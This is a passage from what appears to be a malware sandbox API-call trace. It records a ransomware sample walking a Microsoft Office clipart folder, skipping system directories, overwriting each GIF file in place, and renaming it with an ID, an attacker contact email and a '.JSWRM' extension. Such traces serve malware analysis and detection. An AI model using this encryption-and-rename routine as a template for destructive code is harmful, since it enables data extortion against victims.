dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.068] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0100.068] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0100.068] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0100.068] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0100.068] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e7a0 [0100.069] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0100.069] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0100.069] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB02077_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb02077_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB02077_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb02077_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.069] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e7a0 | out: hHeap=0x1e0000) returned 1 [0100.069] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0100.069] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0100.069] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1107d049, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1107d049, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1107d049, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x996, dwReserved0=0x60002, dwReserved1=0x241c82, cFileName="WB02082_.GIF", cAlternateFileName="")) returned 1 [0100.069] lstrcmpiW (lpString1="WB02082_.GIF", lpString2=".") returned 1 [0100.069] lstrcmpiW (lpString1="WB02082_.GIF", lpString2="..") returned 1 [0100.069] lstrcmpiW (lpString1="WB02082_.GIF", lpString2="...") returned 1 [0100.069] lstrcmpiW (lpString1="WB02082_.GIF", lpString2="windows") returned -1 [0100.069] lstrcmpiW (lpString1="WB02082_.GIF", lpString2="recovery") returned 1 [0100.069] lstrcmpiW (lpString1="WB02082_.GIF", lpString2="perflogs") returned 1 [0100.070] lstrcmpiW (lpString1="WB02082_.GIF", lpString2="documents and settings") returned 1 [0100.070] lstrcmpiW (lpString1="WB02082_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0100.070] lstrcmpiW (lpString1="WB02082_.GIF", lpString2="system volume information") returned 1 [0100.070] lstrcmpiW (lpString1="WB02082_.GIF", lpString2="msocache") returned 1 [0100.070] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0100.070] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB02082_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.070] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB02082_.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB02082_.GIF", lpUsedDefaultChar=0x0) returned 12 [0100.070] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0100.070] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0100.070] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB02082_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.070] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB02082_.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB02082_.GIF", lpUsedDefaultChar=0x0) returned 12 [0100.070] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0100.070] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0100.070] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0100.070] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.070] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.070] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0100.070] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB02082_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb02082_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0100.070] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=2454) returned 1 [0100.070] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.071] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x990) returned 0x20c6c0 [0100.071] ReadFile (in: hFile=0x338, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x990, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e534*=0x990, lpOverlapped=0x0) returned 1 [0100.072] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.072] WriteFile (in: hFile=0x338, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x990, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e530*=0x990, lpOverlapped=0x0) returned 1 [0100.072] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0100.072] CloseHandle (hObject=0x338) returned 1 [0100.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0100.072] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0100.072] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0100.072] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0100.072] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0100.072] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0100.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0100.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0100.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dee0 [0100.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0100.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0100.073] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB02082_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb02082_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB02082_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb02082_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0100.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0100.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0100.073] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x110c9494, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x110c9494, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x110ef705, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x90c, dwReserved0=0x60002, dwReserved1=0x241c82, cFileName="WB02085_.GIF", cAlternateFileName="")) returned 1 [0100.073] lstrcmpiW (lpString1="WB02085_.GIF", lpString2=".") returned 1 [0100.073] lstrcmpiW (lpString1="WB02085_.GIF", lpString2="..") returned 1 [0100.073] lstrcmpiW (lpString1="WB02085_.GIF", lpString2="...") returned 1 [0100.074] lstrcmpiW (lpString1="WB02085_.GIF", lpString2="windows") returned -1 [0100.074] lstrcmpiW (lpString1="WB02085_.GIF", lpString2="recovery") returned 1 [0100.074] lstrcmpiW (lpString1="WB02085_.GIF", lpString2="perflogs") returned 1 [0100.074] lstrcmpiW (lpString1="WB02085_.GIF", lpString2="documents and settings") returned 1 [0100.074] lstrcmpiW (lpString1="WB02085_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0100.074] lstrcmpiW (lpString1="WB02085_.GIF", lpString2="system volume information") returned 1 [0100.074] lstrcmpiW (lpString1="WB02085_.GIF", lpString2="msocache") returned 1 [0100.074] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0100.074] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB02085_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.074] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB02085_.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB02085_.GIF", lpUsedDefaultChar=0x0) returned 12 [0100.074] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0100.074] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0100.074] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB02085_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.074] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB02085_.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB02085_.GIF", lpUsedDefaultChar=0x0) returned 12 [0100.074] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0100.074] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0100.074] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0100.074] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.074] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.074] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0100.074] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB02085_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb02085_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0100.075] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=2316) returned 1 [0100.075] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x900) returned 0x20c6c0 [0100.075] ReadFile (in: hFile=0x338, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x900, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e534*=0x900, lpOverlapped=0x0) returned 1 [0100.076] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.076] WriteFile (in: hFile=0x338, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x900, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e530*=0x900, lpOverlapped=0x0) returned 1 [0100.076] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0100.076] CloseHandle (hObject=0x338) returned 1 [0100.077] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0100.077] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.077] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0100.077] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.077] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0100.077] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0100.077] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.077] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0100.077] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0100.077] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0100.077] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0100.077] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23ddc8 [0100.077] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0100.077] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0100.077] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB02085_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb02085_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB02085_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb02085_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0100.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0100.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0100.078] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x110ef705, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x110ef705, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x110ef705, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x581, dwReserved0=0x60002, dwReserved1=0x241c82, cFileName="WB02097_.GIF", cAlternateFileName="")) returned 1 [0100.078] lstrcmpiW (lpString1="WB02097_.GIF", lpString2=".") returned 1 [0100.078] lstrcmpiW (lpString1="WB02097_.GIF", lpString2="..") returned 1 [0100.078] lstrcmpiW (lpString1="WB02097_.GIF", lpString2="...") returned 1 [0100.078] lstrcmpiW (lpString1="WB02097_.GIF", lpString2="windows") returned -1 [0100.078] lstrcmpiW (lpString1="WB02097_.GIF", lpString2="recovery") returned 1 [0100.078] lstrcmpiW (lpString1="WB02097_.GIF", lpString2="perflogs") returned 1 [0100.078] lstrcmpiW (lpString1="WB02097_.GIF", lpString2="documents and settings") returned 1 [0100.078] lstrcmpiW (lpString1="WB02097_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0100.078] lstrcmpiW (lpString1="WB02097_.GIF", lpString2="system volume information") returned 1 [0100.078] lstrcmpiW (lpString1="WB02097_.GIF", lpString2="msocache") returned 1 [0100.078] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0100.078] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB02097_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.078] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB02097_.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB02097_.GIF", lpUsedDefaultChar=0x0) returned 12 [0100.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0100.078] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0100.078] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB02097_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.078] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB02097_.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB02097_.GIF", lpUsedDefaultChar=0x0) returned 12 [0100.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0100.078] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0100.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0100.078] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.078] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.078] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0100.079] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB02097_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb02097_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0100.080] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=1409) returned 1 [0100.080] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.080] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x580) returned 0x2332c0 [0100.080] ReadFile (in: hFile=0x338, lpBuffer=0x2332c0, nNumberOfBytesToRead=0x580, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesRead=0x345e534*=0x580, lpOverlapped=0x0) returned 1 [0100.081] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.081] WriteFile (in: hFile=0x338, lpBuffer=0x2332c0*, nNumberOfBytesToWrite=0x580, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesWritten=0x345e530*=0x580, lpOverlapped=0x0) returned 1 [0100.081] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2332c0 | out: hHeap=0x1e0000) returned 1 [0100.081] CloseHandle (hObject=0x338) returned 1 [0100.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0100.081] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0100.081] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0100.081] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0100.082] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.082] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0100.082] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0100.082] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0100.082] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0100.082] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23ddc8 [0100.082] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0100.082] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0100.082] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB02097_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb02097_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB02097_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb02097_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.082] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0100.083] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0100.083] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0100.083] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e5c0 | out: 